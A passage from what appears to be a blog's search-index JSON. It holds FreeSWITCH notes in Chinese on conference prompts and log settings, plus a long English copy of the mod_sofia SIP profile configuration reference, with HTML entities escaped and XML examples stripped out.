\u0026ldquo;bridging\u0026rdquo; conference, you must provide another endpoint, or \u0026rsquo;none'. bridge:uuid:none a \u0026ldquo;bridging\u0026rdquo; conference with UUID assigned as conference name 所以,当你遇到问题的时候,应该仔细的再去阅读一下官方的接口文档。\n参考文档\nhttps://txlab.wordpress.com/2012/09/17/setting-up-a-conference-bridge-with-freeswitch/ https://freeswitch.org/confluence/display/FREESWITCH/mod_conference ","permalink":"https://wdd.js.org/freeswitch/conference-announce/","summary":"呼入到会议,正常来说,当会议室有且只有一人时,应该会报“当前只有一人的提示音”。但是测试的时候,输入了密码,进入了会议,却没有播报正常的提示音。\n经过排查发现,dialplan中,会议室的名字中含有@符号。\n按照fs的文档,发现@后面应该是profilename, 然而fs的conference.conf.xml却没有这个profile, 进而导致语音无法播报的问题。所以只要加入这个profile, 或者直接用@default, 就可以正确的播报语音了。\nAction data Description confname profile is \u0026ldquo;default\u0026rdquo;, no flags or pin confname+1234 profile is \u0026ldquo;default\u0026rdquo;, pin is 1234 confname@profilename+1234 profile is \u0026ldquo;profilename\u0026rdquo;, pin=1234, no flags confname+1234+flags{mute} profile is \u0026ldquo;default\u0026rdquo;, pin=1234, one flag confname++flags{endconf|moderator} profile is \u0026ldquo;default\u0026rdquo;, no p.i.n., multiple flags bridge:confname:1000@${domain_name} a \u0026ldquo;bridging\u0026rdquo; conference, you must provide another endpoint, or \u0026rsquo;none'. bridge:uuid:none a \u0026ldquo;bridging\u0026rdquo; conference with UUID assigned as conference name 所以,当你遇到问题的时候,应该仔细的再去阅读一下官方的接口文档。\n参考文档","title":"会议提示音无法正常播放"},{"content":"开启sip信令的日志 这样会让fs把收发的sip信令打印到fs_cli里面,但不是日志文件里面\nsofia global siptrace on # sofia global siptrace off 关闭 开启sofia模块的日志 sofia 模块的日志即使开启,也是输出到fs_cli里面的,不会输出到日志文件里面\nsofia loglevel all 7 # sofia loglevel \u0026lt;all|default|tport|iptsec|nea|nta|nth_client|nth_server|nua|soa|sresolv|stun\u0026gt; [0-9] 将fs_cli的输出,写到日志文件里 sofia tracelevel 会将某些日志重定向到日志文件里 sofia tracelevel debug # sofia tracelevel \u0026lt;console|alert|crit|err|warning|notice|info|debug\u0026gt; 注意,debug级别的日志非常多,仅仅适用于debug\n大量的日志写入磁盘\n占用太多的io 磁盘空间可能很快占满 ","permalink":"https://wdd.js.org/freeswitch/log-settings/","summary":"开启sip信令的日志 这样会让fs把收发的sip信令打印到fs_cli里面,但不是日志文件里面\nsofia global siptrace on # sofia global siptrace off 关闭 开启sofia模块的日志 sofia 模块的日志即使开启,也是输出到fs_cli里面的,不会输出到日志文件里面\nsofia loglevel all 7 # sofia loglevel \u0026lt;all|default|tport|iptsec|nea|nta|nth_client|nth_server|nua|soa|sresolv|stun\u0026gt; [0-9] 将fs_cli的输出,写到日志文件里 sofia tracelevel 会将某些日志重定向到日志文件里 sofia tracelevel debug # sofia tracelevel \u0026lt;console|alert|crit|err|warning|notice|info|debug\u0026gt; 注意,debug级别的日志非常多,仅仅适用于debug\n大量的日志写入磁盘\n占用太多的io 磁盘空间可能很快占满 ","title":"FS日志设置"},{"content":"About Sofia is a FreeSWITCH™ module (mod_sofia) that provides SIP connectivity to and from FreeSWITCH in the form of a User Agent. A \u0026ldquo;User Agent\u0026rdquo; (\u0026ldquo;UA\u0026rdquo;) is an application used for handling a certain network protocol; the network protocol in Sofia\u0026rsquo;s case is SIP. Sofia is the general name of any User Agent in FreeSWITCH using the SIP network protocol. For example, Sofia receives calls sent to FreeSWITCH from other SIP User Agents (UAs), sends calls to other UAs, acts as a client to register FreeSWITCH with other UAs, lets clients register with FreeSWITCH, and connects calls (i.e., to local extensions). To add a SIP Provider (Sofia User Agent) to your FreeSWITCH, please see the Interoperability Examples and add the SIP Provider information in an .xml file stored under conf/sip_profiles/\nClick here to expand Table of Contents\nSofia allows for multiple User Agents A \u0026ldquo;User Agent\u0026rdquo; (\u0026ldquo;UA\u0026rdquo;) is an application used for running a certain network protocol, and a Sofia UA is the same thing but the protocol in that case is SIP. When FreeSWITCH starts, it reads the conf/autoload_configs/sofia.conf.xml file. That file contains a \u0026ldquo;X-PRE-PROCESS\u0026rdquo; directive which instructs FreeSWITCH to subsequently load and merge any conf/sip_profiles/*.xml files. Each *.xml file so loaded and merged should contain a complete description of one or more SIP Profiles. Each SIP Profile so loaded is part of a \u0026ldquo;User Agent\u0026rdquo; or \u0026ldquo;UA\u0026rdquo;; in FreeSWITCH terms, UA = User Agent = Sofia Profile = SIP Profile. Note that the individual UAs so loaded are all merged together by FreeSWITCH and must not interfere with each other: In particular, each UA must have its own unique port on which it accepts connections (the default port for SIP is 5060).\nMultiple User Agents (Profiles) and the Dialplan Why might you want to create multiple User Agents? Here\u0026rsquo;s an example. In my office, I use a firewall. This means that calls I make to locations outside the firewall must use a STUN server to transverse the NAT in the firewall, while calls within the office don\u0026rsquo;t need to use a STUN server. In order to accommodate these requirements, I\u0026rsquo;ve created two different UAs. One of them uses a STUN server and for that matter also connects up to the PSTN through a service provider. The other UA is purely for local SIP calls. Now I\u0026rsquo;ve got two UAs defined by my profiles, each of which can handle a call. When dialing a SIP address or telephone number, which UA is used? That determination is made in the dialplan. One syntax for making a call via Sofia in the dialplan is sofia/profile_name/destination\nSo, the task becomes rather straightforward. Dialplans use pattern matching and other tricks to determine how to handle a call. My dialplan examines what I\u0026rsquo;ve dialed and then determines what profile to use with that call. If I dial a telephone number, the dialplan selects the UA that connects up to the PSTN. If I dial a SIP address outside the firewall, the dialplan selects that same UA because it uses the STUN server. But if I dial a SIP address that\u0026rsquo;s inside the firewall, the dialplan selects the \u0026ldquo;local\u0026rdquo; UA. To understand how to write dialplans, use pattern matching, etc., see Dialplan\nThe Relationship Between SIP Profiles and Domains The following content was written in a mailing list thread by Anthony Minessale in response to questions about how SIP profiles relate to domain names in FreeSWITCH. The best thing to do is take a look at these things from a step back. The domains inside the XML registry are completely different from the domains on the internet and again completely different from domains in sip packets. The profiles are again entirely different from any of the above. Its up to you to align them if you so choose. The default configuration distributed with FreeSWITCH sets up the scenario most likely to load on any machine and work out of the box. That is the primary goal of that configuration, so, It sets the domain in both the directory, the global default domain variable and the name of the internal profile to be identical to the IP addr on the box that can reach the internet. Then it sets the sip to force everything to that value. When you want to detach from this behavior, you are probably on a venture to do some kind of multi-home setup. Aliases in the tag are a list of keys you want to use to use that lead to the current profile your are configuring. Think of it as the /etc/hosts file in Unix, only for profiles. When you define aliases to match all of the possible domains hosted on a particular profile, then when you try to take a user@host.com notation and decide which profile it came from, you can use the aliases to find it providing you have added to that profile. The tag is an indicator telling the profile to open the XML registry in FreeSWITCH and run through any domains defined therein. The 2 key attributes are: alias: [true/false] (automatically create an alias for this domain as mentioned above) parse: [true/false] (scan the domain for gateway entries and include them into this profile) name: [] (either the name of a specific domain or \u0026lsquo;all\u0026rsquo; to denote parsing every domain in the directory)\nAs you showed in your question the default config has If you apply what you have learned above, it will scan for every domain (there is only one by default) and add an alias for it and not parse it for gateways. The default directory uses global config vars to set the domain to match the local IP addr on the box. So now you will have a domain in your config that is your IP addr, and the internal profile will attach to it and add an alias so that value expands to match it. This is explained in a comment at the top of directory/default.xml: FreeSWITCH works off the concept of users and domains just like email. You have users that are in domains for example 1000@domain.com.\nWhen freeswitch gets a register packet it looks for the user in the directory based on the from or to domain in the packet depending on how your sofia profile is configured. Out of the box the default domain will be the IP address of the machine running FreeSWITCH. This IP can be found by typing \u0026ldquo;sofia status\u0026rdquo; at the CLI. You will register your phones to the IP and not the hostname by default. If you wish to register using the domain please open vars.xml in the root conf directory and set the default domain to the hostname you desire. Then you would use the domain name in the client instead of the IP address to register with FreeSWITCH.\nSo having more than one profile with the default of is going to end up aliasing the same domains into all profiles who call it and cause an overwrite in the lookup table and probably an error in your logs somewhere. If you had parse=\u0026ldquo;true\u0026rdquo; on all of them, they would all try and register to the gateways in all of your domains. If you look at the stock config, external.xml is a good example of a secondary profile, it has so no aliases, and yes parse \u0026hellip; the exact opposite of the internal so that all the gateways would register from external and internal would bind to the local IP addr. So, you probably want to use separate per domain per profile you want to bind it to in more complicated setups.\nStructure of a Profile Each profile may contain several different subsections. At the present time there\u0026rsquo;s no XSD or DTD for sofia.conf.xml — and any volunteer who can create one would be very welcome indeed.\nGateway Each profile can have several gateways: elements\u0026hellip; elements\u0026hellip; A gateway has an attribute \u0026ldquo;name\u0026rdquo; by which it can be referred. A gateway describes how to use a different UA to reach destinations. For example, the gateway may provide access to the PSTN, or to a private SIP network. The reason for defining a gateway, presumably, is because the gateway requires certain information before it will accept a call from the FreeSWITCH User Agent. Variables can be defined on a gateway. Inbound variables are set on the channel of a call received from a gateway, outbound variables are set on the channel of a call sent to a gateway. An example gateway configuration would be: To reach a particular gateway from the dial plan, use sofia/gateway/\u0026lt;gateway_name\u0026gt;/\nFreeSWITCH can also subscribe to receive notification of events from the gateway. For more information see Presence - Use FreeSWITCH as a Client\nParameters The following is a list of param elements that are children of a gateway element:\nNote: The username param for the gateway is not to be confused with the username param in the Profile settings config!\nNote: extension parameter influence the contents of channel variable Caller-Destination-Number and destination_number. If it is blank, Caller-Destination-Number will always be set to gateway\u0026rsquo;s username. If it has a value, Caller-Destination-Number will always be set to this value. If it has value auto_to_user, Caller-Destination-Number will be populated with value ${sip_to_user} which means the real dialled number in case of an inbound call.\nping-min means \u0026ldquo;how many successful pings we must have before declaring a gateway up\u0026rdquo;. The interval between ping-min and ping-max is the \u0026ldquo;safe area\u0026rdquo; where a gateway is marked as UP. So if we have, for example, min 3 and max 6, if the gateway is up and we move counter between 3,4,5,6 the gateway will be up. If from 6 we loose 4 (so counter == 2) pings in a row, the gateway will be declared down. Please note that on sofia startup the gateway is always started as UP, so it will be up even if ping-min is \u0026gt; 1 . the \u0026ldquo;right\u0026rdquo; way starts when the gateway goes down.\nParam \u0026ldquo;register,\u0026rdquo; is used when this profile acts as a client to another UA. By registering, FreeSWITCH informs the other UA of its whereabouts. This is generally used when FreeSWITCH wants the other UA to send FreeSWITCH calls, and the other UA expects this sort of registration. If FreeSWITCH uses the other UA only as a gateway (e.g., to the PSTN), then registration is not generally required. Param \u0026ldquo;distinct-to\u0026rdquo; is used when you want FS to register using a distict AOR for header To. It requires proper setting of related parameters. For example if you want the REGISTER to go with: From: sip:someuser@somedomain.com To: sip:anotheruser@anotherdomain.com\nThen set the parameters as this: The latter param, \u0026ldquo;ping\u0026rdquo; is used to check gateway availability. By setting this option, FreeSWITCH will send SIP OPTIONS packets to gateway. If gateway responds with 200 or 404, gateway is pronounced up, otherwise down. [N.B. It appears that other error messages can be returned and still result in the gateway being marked as \u0026lsquo;up\u0026rsquo;?] If any call is routed to gateway with state down, FreeSWITCH will generate NETWORK_OUT_OF_ORDER hangup cause. Ping frequency is defined in seconds (value attribute) and has a minimum value of 5 seconds. Param \u0026ldquo;extension-in-contact\u0026rdquo; is used to force what the contact info will be in the registration. If you are having a problem with the default registering as gw+gateway_name@ip you can set this to true to use extension@ip. If extension is blank, it will use username@ip.\nif you need to insert the FROM digits to the Contact URI User Part when sending call to gateway BEFORE From: \u0026ldquo;8885551212\u0026rdquo; sip:88855512120@8.8.8.8 Contact: sip:gw+mygateway@7.7.7.7:7080 try adding these to gateway params\nThese channel variables will be set on all calls going through this gateway in the specified direction. However, see below for a special syntax to set profile variables rather than channel variables. Settings Settings include other, more general information about the profile, including whether or not STUN is in use. Each profile has its own settings element. Not only is this convenient — it\u0026rsquo;s possible to set up one profile to use STUN and another, with a different gateway or working behind the firewall, not needing STUN — but it\u0026rsquo;s also crucial. That\u0026rsquo;s because each profile defines a SIP User Agent, and each UA must have its own unique \u0026ldquo;sip-port.\u0026rdquo; By convention, 5060 is the default port, but it\u0026rsquo;s possible to make calls to, e.g., \u0026ldquo;foo@sip.example.com:5070\u0026rdquo;, and therefore you can define any port you please for each individual profile. The conf directory contains a complete sample sofia.conf.xml file, along with comments. See Git examples: Internal, External\nBasic settings alias This seems to make the SIP profile bind to this IP \u0026amp; port as well as your SIP / RTP IPs and ports. Anthony had this to say about aliases in a ML thread: Aliases in the tag are a list of keys you want to use to use that lead to the current profile your are configuring. Think of it as the /etc/hosts file in unix only for profiles. When you define aliases to match all of the possible domains hosted on a particular profile, then when you try to take a user@host.com notation and decide which profile it came from, you can use the aliases to find it providing you have added to that profile.\nshutdown-on-fail If set to true and the profile fails to load, FreeSWITCH will shut down. This is useful if you are running something like Pacemaker and OpenAIS which manage a pair of FreeSWITCH nodes and automatically monitor, start, stop, restart, and standby-on-fail the nodes. It will ensure that the specific node is not able to be used in a \u0026ldquo;partially up\u0026rdquo; situation.\nuser-agent-string This sets the User-Agent header in all SIP messages sent by your server. By default this could be something like \u0026ldquo;FreeSWITCH-mod_sofia/1.0.trunk-12805\u0026rdquo;. If you didn\u0026rsquo;t want to advertise detailed version information you could simply set this to \u0026ldquo;FreeSWITCH\u0026rdquo; or even \u0026ldquo;Asterisk PBX\u0026rdquo; as a joke. Take care when setting this value as certain characters such as \u0026lsquo;@\u0026rsquo; could cause other SIP proxies could reject your messages as invalid.\nlog-level sip-trace context Dialplan context in which to dump calls that come in to this profile\u0026rsquo;s ip:port\nsip-port Port to bind to for SIP traffic:\nsip-ip IP address to bind to for SIP traffic. DO NOT USE HOSTNAMES, ONLY IP ADDRESSES\nrtp-ip IP address to bind to for RTP traffic. DO NOT USE HOSTNAMES, ONLY IP ADDRESSES Multiple rtp-ip support: if more rtp-ip parameters are added, they will be used in round-robin as new calls progress. IPv6 addresses are not supported under Windows at the time of writing. See FS-4445 ext-rtp-ip This is the IP behind which FreeSWITCH is seen from the Internet, so if FreeSWITCH is behind NAT, this is basically the public IP that should be used for RTP. Possible values are: Any variable from vars.xml, e.g. $${external_rtp_ip}:\n\u0026ldquo;specific IP address\u0026rdquo;\n\u0026ldquo;when used for LAN and WAN to avoid errors in the SIP CONTACT sent to LAN devices, use\u0026rdquo;\n\u0026ldquo;auto\u0026rdquo;: the guessed IP will be used (guessed by looking in the IP routing table which interface is the default route)\n\u0026ldquo;auto-nat\u0026rdquo;: FreeSWITCH will use uPNP or NAT-PMP to discover the public IP address it should use\n\u0026ldquo;stun:DNS name or IP address\u0026rdquo;: FreeSWITCH will use the STUN server of your choice to discover the public IP address\n\u0026ldquo;host:DNS name\u0026rdquo;: FreeSWITCH will resolve the DNS name as the public IP address, so you can use a dynamic DNS host\nATTENTION: AS OF 2012Q4, \u0026rsquo;ext–\u0026rsquo; prefixed params cited above when populated with to-be-resolved DNS strings \u0026ndash; e.g. name=\u0026ldquo;ext–sip–ip\u0026rdquo; value=\u0026ldquo;stun:stun.freeswitch.org\u0026rdquo; or name=\u0026ldquo;ext‑rtp–ip\u0026rdquo; value=\u0026ldquo;host:mypublicIP.dyndns.org\u0026rdquo; \u0026ndash; are resolved to IP addresses once only at FS load time and const thereafter. FS is blind to (unaware of) any subsequent changes in your environment\u0026rsquo;s IP address. Thus, these ext– vars may become functionally incompatible with the environment\u0026rsquo;s current IP addresses with unspecified results in call flow at the network layer. FS restart is required for FS to capture the now-current, working IP address(es).\next-sip-ip This is the IP behind which FreeSWITCH is seen from the Internet, so if FreeSWITCH is behind NAT, this is basically the public IP that should be used for SIP. Possibles values are the same as those for ext-rtp-ip, and it is usually set to the same value.\ntcp-keepalive Set this to interval (in milliseconds) to send keep alive packets to user agents (UAs) registered via TCP; do not set to disable.\ntcp-pingpong tcp-ping2pong dialplan The dialplan parameter is very powerful. In the simplest configuration, it will use the XML dialplan. This means that it will read data from mod_xml_curl XML dialplans (e.g., callback to your webserver), or failing that, from the XML files specified in freeswitch.xml dialplan section. (e.g. default_context.xml)\nYou can also add enum lookups into the picture (since mod_enum provides dialplan functionality), so enum lookups override the XML dialplan\nOr reverse the order to enum is only consulted if XML lookup fails\nIt is also possible to specify a specific enum root\nOr use XML on a custom file\nWhere it will first check the specific XML file, then hit normal XML which also do a mod_xml_curl lookup assuming you have that configured and working.\nMedia related options See also: Proxy Media\nresume-media-on-hold When calls are in no media this will bring them back to media when you press the hold button. To return the calls to bypass-media after the call is unheld, enable bypass-media-after-hold.\nbypass-media-after-att-xfer This will allow a call after an attended transfer go back to bypass media after an attended transfer. bypass-media-after-hold This will allow a call to go back to bypass media after a hold. This option can be enabled only if resume-media-on-hold is set. Available from git rev 8fa385b. inbound-bypass-media Uncomment to set all inbound calls to no media mode. It means that the FreeSWITCH server only keeps the SIP messages state, but have the RTP steam go directly from end-point to end-point\ninbound-proxy-media Uncomment to set all inbound calls to proxy media mode. This means the FreeSWITCH keeps both the SIP and RTP traffic on the server but does not interact with the RTP stream.\ndisable-rtp-auto-adjust ignore-183nosdp enable-soa Set the value to \u0026ldquo;false\u0026rdquo; to diable SIP SOA from sofia to tell sofia not to touch the exchange of SDP\nt38-passthru The following options are available\n\u0026rsquo;true\u0026rsquo; enables t38 passthru \u0026lsquo;false\u0026rsquo; disables t38 passthru \u0026lsquo;once\u0026rsquo; enables t38 passthru, but sends t.38 re-invite only once (available since commit 08b25a8 from Nov. 9, 2011) Codecs related options Also see:\nCodec Negotiation Supported Codecs inbound-codec-prefs This parameter allows to change the allowed inbound codecs per profile. outbound-codec-prefs This parameter allows to change the outbound codecs per profile. codec-prefs This parameter allows to change both inbound-codec-prefs and outbound-codec-prefs at the same time. inbound-codec-negotiation set to \u0026lsquo;greedy\u0026rsquo; if you want your codec list to take precedence if \u0026lsquo;greedy\u0026rsquo; doesn\u0026rsquo;t work for you, try \u0026lsquo;scrooge\u0026rsquo; which has been known to fix misreported ptime issues with DID providers such as CallCentric. A rule of thumb is:\n\u0026lsquo;generous\u0026rsquo; permits the remote codec list have precedence and \u0026lsquo;win\u0026rsquo; the codec negotiation and selection process \u0026lsquo;greedy\u0026rsquo; forces a win by the local FreeSWITCH preference list \u0026lsquo;scrooge\u0026rsquo; takes \u0026lsquo;greedy\u0026rsquo; a step further, so that the FreeSWITCH wins even when the far side lies about capabilities during the negotiation process sip_codec_negotiation is a channel variable version of this setting\ninbound-late-negotiation Uncomment to let calls hit the dialplan before you decide if the codec is OK. bitpacking This setting is for AAL2 bitpacking on G.726. disable-transcoding Uncomment if you want to force the outbound leg of a bridge to only offer the codec that the originator is using\nrenegotiate-codec-on-reinvite STUN If you need to use a STUN server, here are common working examples:\next-rtp-ip stun.fwdnet.net is a publicly-accessible STUN server.\next-sip-ip stun-enabled Simple traversal of UDP over NATs (STUN), is used to help resolve the problems associated with SIP clients, behind NAT, using private IP address space in their messaging. Use stun when specified (default is true).\nstun-auto-disable Set to true to have the profile determine stun is not useful and turn it off globally\nNATing apply-nat-acl When receiving a REGISTER or INVITE, enable NAT mode automatically if IP address in Contact header matches an entry defined in the RFC 1918 access list. \u0026ldquo;acl\u0026rdquo; is a misnomer in this case because access will not be denied if the user\u0026rsquo;s contact IP doesn\u0026rsquo;t match.\naggressive-nat-detection This will enable NAT mode if the network IP/port from which the request was received differs from the IP/Port combination in the SIP Via: header, or if the Via: header contains the received parameter (regardless of what it contains.) Note 2009-04-05: Someone please clarify when this would be useful. It seems to me if someone needed this feature, chances are that things are so broken that they would need to use NDLB-force-rport\nVAD and CNG VAD stands for Voice Activity Detector. FreeSWITCH is capable of detecting speech and can stop transmitting RTP packets when no voice is detected.\nvad suppress-cng Suppress Comfort Noise Generator (CNG) on this profile or per call with the \u0026lsquo;suppress_cng\u0026rsquo; variable\nNDLB (A.K.A. No device left behind) NDLB-force-rport This will force FreeSWITCH to send SIP responses to the network port from which they were received. Use at your own risk! For more information see NAT Traversal.\nsafe = param that does force-rport behavior only on endpoints we know are safe to do so on. This is a dirty hack to try to work with certain endpoints behind sonicwall which does not use the same port when it does nat, when the devices do not support rport, while not breaking devices that acutally use different ports that force-rport will break NDLB-broken-auth-hash Used for when phones respond to a challenged ACK with method INVITE in the hash\nNDLB-received-in-nat-reg-contact add a ;received=\u0026quot;:\u0026quot; to the contact when replying to register for nat handling\nNDLB-sendrecv-in-session By default, \u0026ldquo;a=sendrecv\u0026rdquo; is only included in the media portion of the SDP. While this is RFC-compliant, it may break functionality for some SIP devices. To also include \u0026ldquo;a=sendrecv\u0026rdquo; in the session portion of the SDP, set this parameter to true.\nNDLB-allow-bad-iananame Introduced in rev. 15401, this was enabled by default prior to new param. Will allow codecs to match respective name even if the given string is not correct. i.e., Linksys and Sipura phones will pass G.729a by default instead of G.729 as codec string therefore not matching. If you wish to allow bad IANA names to match respective codec string, add the following param to your SIP profile. Refer to RFC 3551, RFC 3555 and the IANA list(s) for SDP\nCall ID inbound-use-callid-as-uuid On inbound calls make the uuid of the session equal to the SIP call id of that call.\noutbound-use-uuid-as-callid On outbound calls set the callid to match the uuid of the session\nThis goes in the \u0026ldquo;..sip_profiles/external.xml\u0026rdquo; file.\nTLS Please make sure to read SIP TLS before enabling certain features below as they may not behave as expected.\ntls TLS: disabled by default, set to \u0026ldquo;true\u0026rdquo; to enable tls-only disabled by default, when enabled prevents sofia from listening on the unencrypted port for this connection. This can stop many generic brute force scripts and if all your clients connect over TLS then can help decrease the exposure of your FreeSWITCH server to the world. tls-bind-params additional bind parameters for TLS tls-sip-port Port to listen on for TLS requests. (5061 will be used if unspecified) tls-cert-dir Location of the agent.pem and cafile.pem ssl certificates (needed for TLS server) tls-version TLS version (\u0026ldquo;sslv2\u0026rdquo;, \u0026ldquo;sslv3\u0026rdquo;, \u0026ldquo;sslv23\u0026rdquo;, \u0026ldquo;tlsv1\u0026rdquo;, \u0026ldquo;tlsv1.1\u0026rdquo;, \u0026ldquo;tlsv1.2\u0026rdquo;). NOTE: Phones may not work with TLSv1 When not set defaults to: \u0026ldquo;tlsv1,tlsv1.1,tlsv1.2\u0026rdquo;\ntls-passphrase If your agent.pem is protected by a passphrase stick the passphrase here to enable FreeSWITCH to decrypt the key. tls-verify-date If the client/server certificate should have the date on it validated to ensure it is not expired and is currently active. tls-verify-policy This controls what, if any security checks are done against server/client certificates. Verification is generally checking certificates are valid against the cafile.pem. Set to \u0026lsquo;in\u0026rsquo; to only verify incoming connections, \u0026lsquo;out\u0026rsquo; to only verify outgoing connections, \u0026lsquo;all\u0026rsquo; to verify all connections, also \u0026lsquo;subjects_in\u0026rsquo;, \u0026lsquo;subjects_out\u0026rsquo; and \u0026lsquo;subjects_all\u0026rsquo; for subject validation (subject validation for outgoing connections is against the hostname/ip connecting to). Multiple policies can be split with a \u0026lsquo;|\u0026rsquo; pipe, for example \u0026lsquo;subjects_in|subjects_out\u0026rsquo;. Defaults to none. tls-verify-depth When certificate validation is enabled (tls-verify-policy) how deep should we try to verify a certificate up the chain again the cafile.pem file. By default only depth of 2. tls-verify-in-subjects If subject validation is enabled for incoming connections (tls-verify-policy set to \u0026lsquo;subjects_in\u0026rsquo; or \u0026lsquo;subjects_all\u0026rsquo;) this is the list of subjects that are allowed (delimit with a \u0026lsquo;|\u0026rsquo; pipe), note this only effects incoming connections for outgoing connections subjects are always checked against hostnames/ips. DTMF rfc2833-pt TODO RFC 2833 is obsoleted by RFC 4733.\ndtmf-duration dtmf-type TODO RFC 2833 is obsoleted by RFC 4733. Set the parameter in the SIP profile:\nor\nor\nOR set the variable in the SIP gateway or user profile (NOT in the channel, it must be before CS_INIT): Note the \u0026ldquo;_\u0026rdquo; instead of \u0026ldquo;-\u0026rdquo; in profile param (this is var set in dialplan). (24.10.2010: \u0026ldquo;both\u0026rdquo; don\u0026rsquo;t seem to me work in my tests, \u0026ldquo;outbound\u0026rdquo; does) Note: for inband DTMF, Misc. Dialplan Tools start_dtmf must be used in the dialplan. Also, to change the outgoing routing from info or rfc2833 to inband, use Misc._Dialplan_Tools_start_dtmf_generate RFC 2833\npass-rfc2833 TODO RFC 2833 is obsoleted by RFC 4733. Default: false If true, it passes RFC 2833 DTMF\u0026rsquo;s from one side of a bridge to the other, untouched. Otherwise, it decodes and re-encodes them before passing them on.\nliberal-dtmf TODO RFC 2833 is obsoleted by RFC 4733. Default: false For DTMF negotiation, use this parameter to just always offer 2833 and accept both 2833 and INFO. Use of this parameter is not recommended since its purpose is to try to cope with buggy SIP implementations.\nSIP Related options enable-timer This enables or disables support for RFC 4028 SIP Session Timers.\nNote: If your switch requires the timer option; for instance, Huawei SoftX3000, it needs this optional field and drops the calls with \u0026ldquo;Session Timer Check Message Failed\u0026rdquo;, then you may be able to revert back the commit that took away the Require: timer option which is an optional field by: git log -1 -p 58c3c3a049991fedd39f62008f8eb8fca047e7c5 libs/sofia-sip/libsofia-sip-ua | patch -p1 -R touch libs/sofia-sip/.update\nmake mod_sofia-clean make mod_sofia-install\nenable-100rel This enable support for 100rel (100% reliability - PRACK message as defined in RFC3262) This fixes a problem with SIP where provisional messages like \u0026ldquo;180 Ringing\u0026rdquo; are not ACK\u0026rsquo;d and therefore could be dropped over a poor connection without retransmission. 2009-07-08: Enabling this may cause FreeSWITCH to crash, see FSCORE-392.\nminimum-session-expires This sets the \u0026ldquo;Min-SE\u0026rdquo; value (in seconds) from RFC 4028. This value must not be less than 90 seconds.\nsip-options-respond-503-on-busy When set to true, this param will make FreeSWITCH respond to incoming SIP OPTIONS with 503 \u0026ldquo;Maximum Calls In Progress\u0026rdquo; when FS is paused or maximum sessions has been exceeded. When set to false or when not set at all (default behavior), SIP OPTIONS are always responded with 200 \u0026ldquo;OK\u0026rdquo;.\nSetting this param to true is especially useful if you\u0026rsquo;re using a proxy such as OpenSIPS or Kamailio with dispatcher module to probe your FreeSWITCH servers by sending SIP OPTIONS.\nsip-force-expires Setting this param overrides the expires value in the 200 OK in response to all inbound SIP REGISTERs towards this sip_profile. This param can be overridden per individual user by setting a sip-force-expires user directory variable.\nsip-expires-max-deviation Setting this param adds a random deviation to the expires value in the 200 OK in response to all inbound SIP REGISTERs towards this sip_profile. Result will be that clients will not re-register at the same time-interval thus spreading the load on your system. For example, if you set:\nthen the expires that is responded will be between 1800-600=1200 and 1800+600=2400 seconds. This param can be overridden per individual user by setting a sip-expires-max-deviation user directory variable.\noutbound-proxy Setting this param will send all outbound transactions to the value set by outbound-proxy. send-display-update Tells FreeSWITCH not to send display UPDATEs to the leg of the call. RTP Related options auto-jitterbuffer-msec Set this to the size of the jitterbuffer you would like to have on all calls coming through this profile.\nrtp-timer-name rtp-rewrite-timestamps If you don\u0026rsquo;t want to pass through timestamps from 1 RTP stream to another, rtp-rewrite-timestamps is a parameter you can set in a SIP Profile (on a per call basis with rtp_rewrite_timestamps chanvar in a dialplan). The result is that FreeSWITCH will regenerate and rewrite the timestamps in all the RTP streams going to an endpoint using this SIP Profile. This could be necessary to fix audio issues when sending calls to some paranoid and not RFC-compliant gateways (Cirpack is known to require this).\nmedia_timeout was: rtp-timeout-sec (deprecated) The number of seconds of RTP inactivity (media silence) before FreeSWITCH considers the call disconnected, and hangs up. It is recommended that you use session timers instead. If this setting is omitted, the default value is \u0026ldquo;0\u0026rdquo;, which disables the timeout.\nmedia_hold_timeout was: rtp-hold-timeout-sec (deprecated) The number of seconds of RTP inactivity (media silence) for a call placed on hold by an endpoint before FreeSWITCH considers the call disconnected, and hangs up. It is recommended that you use session timers instead. If this setting is omitted, the default value is \u0026ldquo;0\u0026rdquo;, which disables the timeout.\nrtp-autoflush-during-bridge Controls what happens if FreeSWITCH detects that it\u0026rsquo;s not keeping up with the RTP media (audio) stream on a bridged call. (This situation can happen if the FreeSWITCH server has insufficient CPU time available.) When set to \u0026ldquo;true\u0026rdquo; (the default), FreeSWITCH will notice when more than one RTP packet is waiting to be read in the incoming queue. If this condition persists for more than five seconds, RTP packets will be discarded to \u0026ldquo;catch up\u0026rdquo; with the audio stream. For example, if there are always five extra 20 ms packets in the queue, 100 ms of audio latency can be eliminated by discarding the packets. This will cause an audio glitch as some audio is discarded, but will improve the latency by 100 ms for the rest of the call. If rtp-autoflush-during-bridge is set to false, FreeSWITCH will instead preserve all RTP packets on bridged calls, even if it increases the latency or \u0026ldquo;lag\u0026rdquo; that callers hear.\nrtp-autoflush Has the same effect as \u0026ldquo;rtp-autoflush-during-bridge\u0026rdquo;, but affects NON-bridged calls (such as faxes, IVRs and the echo test). Unlike \u0026ldquo;rtp-autoflush-during-bridge\u0026rdquo;, the default is false, meaning that high-latency packets on non-bridged calls will not be discarded. This results in smoother audio at the possible expense of increasing audio latency (or \u0026ldquo;lag\u0026rdquo;). Setting \u0026ldquo;rtp-autoflush\u0026rdquo; to true will discard packets to minimize latency when possible. Doing so may cause errors in DTMF recognition, faxes, and other processes that rely on receiving all packets.\nAuth These settings deal with authentication: requirements for identifying SIP endpoints to FreeSWITCH.\nchallenge-realm Choose the realm challenge key. Default is auto_to if not set. auto_from - uses the from field as the value for the SIP realm. auto_to - uses the to field as the value for the SIP realm. - you can input any value to use for the SIP realm. If you want URL dialing to work you\u0026rsquo;ll want to set this to auto_from. If you use any other value besides auto_to or auto_from you\u0026rsquo;ll loose the ability to do multiple domains. Note: comment out to restore the behavior before 2008-09-29\naccept-blind-auth accept any authentication without actually checking (not a good feature for most people)\nauth-calls Users in the directory can have \u0026ldquo;auth-acl\u0026rdquo; parameters applied to them so as to restrict users access to a predefined ACL or a CIDR.\nValue can be \u0026ldquo;false\u0026rdquo; to disable authentication on this profile, meaning that when calls come in the profile will not send an auth challenge to the caller.\nlog-auth-failures Write log entries ( Warning ) on authentication failures ( Registration \u0026amp; Invite ). useful for users wishing to use fail2ban. note: Required SVN#15654 or higher\nauth-all-packets On authed calls, authenticate all the packets instead of only INVITE and REGISTER(Note: OPTIONS, SUBSCRIBE, INFO and MESSAGE are not authenticated even with this option set to true, see http://jira.freeswitch.org/browse/FS-2871)\nRegistration disable-register disable register which may be undesirable in a public switch\nmultiple-registrations Valid values for this parameter are \u0026ldquo;contact\u0026rdquo;, \u0026ldquo;true\u0026rdquo;, 